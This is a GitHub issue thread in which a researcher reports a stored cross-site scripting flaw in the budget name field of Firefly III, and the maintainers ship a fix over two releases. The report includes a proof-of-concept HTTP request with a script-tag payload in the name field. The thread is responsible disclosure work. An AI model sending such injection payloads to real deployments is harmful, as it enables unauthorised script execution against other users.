Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in budget name #2335

Closed
dayn1ne opened this issue Jul 15, 2019 · 7 comments
Closed

Stored XSS in budget name #2335

dayn1ne opened this issue Jul 15, 2019 · 7 comments
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).

Comments

@dayn1ne
Copy link

dayn1ne commented Jul 15, 2019

Description
Current version of Firefly III Version 4.7.17 is vulnerable to stored XSS due to lack of filtration of user-supplied data in budget name. Malicious attacker can create specially crafted link, which contains javascript code and assign it to budget name. User who add transactions with malicious budget, can view page with that transaction on tag summary page (http://firefly.host/tags/show/$tag_number$), malicious javascript code will be executed.

Steps to reproduce
I create a small video for reproduce steps
XSS Steps.zip

PoC

POST /budgets/store HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
Cookie: firefly_session=<Your session here>;
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

_token=<Your token here>=1&name=<script>alert("XSS PoC")</script>

Screenshot 2019-07-15 at 17 18 30

@JC5
Copy link
Member

JC5 commented Jul 15, 2019

Thanks, nice find. I'll verify and push an update as soon as I can. You're mixing up tags and budgets by the way, is this correct?

@JC5
Copy link
Member

JC5 commented Jul 15, 2019

Sorry, I see what you mean.

@JC5 JC5 closed this as completed in 45ddb64 Jul 15, 2019
@JC5
Copy link
Member

JC5 commented Jul 15, 2019

I have pushed 4.7.17.1 that should fix the bug and a similar one in category names. The docker builds are running now. In my haste, I completely forgot to credit you which I will do in my release post and on reddit, after you confirm the issue is gone.

I've reopened the issue as GitHub has automatically closed it.

@JC5 JC5 reopened this Jul 15, 2019
@JC5 JC5 added the bug Verified and replicated bugs and issues. label Jul 15, 2019
@dayn1ne
Copy link
Author

dayn1ne commented Jul 15, 2019

I have pushed 4.7.17.1 that should fix the bug and a similar one in category names. The docker builds are running now. In my haste, I completely forgot to credit you which I will do in my release post and on reddit, after you confirm the issue is gone.

I've reopened the issue as GitHub has automatically closed it.

I check commit - 45ddb64 and see only changes to versions in some files and change titles in other.

But anyway i got source code from https://github.com/firefly-iii/firefly-iii/releases/tag/4.7.17.1 and install it for checking.

Vulnerability still exist

I uploaded the video to the dropbox - (https://www.dropbox.com/s/gdr87bh4pat5ly5/xss_2.mov?dl=0)

@JC5 JC5 closed this as completed in def3070 Jul 15, 2019
@JC5 JC5 reopened this Jul 15, 2019
@JC5
Copy link
Member

JC5 commented Jul 15, 2019

You're right. I am an idiot. I pushed the correct fix in 4.7.17.2. Can you confirm?

@dayn1ne
Copy link
Author

dayn1ne commented Jul 15, 2019

You're right. I am an idiot. I pushed the correct fix in 4.7.17.2. Can you confirm?

Confirm, i cannot reproduce XSS

Thank you for such quick fix and for this wonderful budget app.
I will continue search for security bugs and will inform you if found them

@JC5
Copy link
Member

JC5 commented Jul 15, 2019

No problem, please do. You know where to find me!

@JC5 JC5 added the fixed Bugs that are fixed (in a coming release). label Jul 15, 2019
@JC5 JC5 closed this as completed Aug 3, 2019
@lock lock bot locked as resolved and limited conversation to collaborators Jan 19, 2020
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
bug Verified and replicated bugs and issues. fixed Bugs that are fixed (in a coming release).
Projects
None yet
Development

No branches or pull requests

2 participants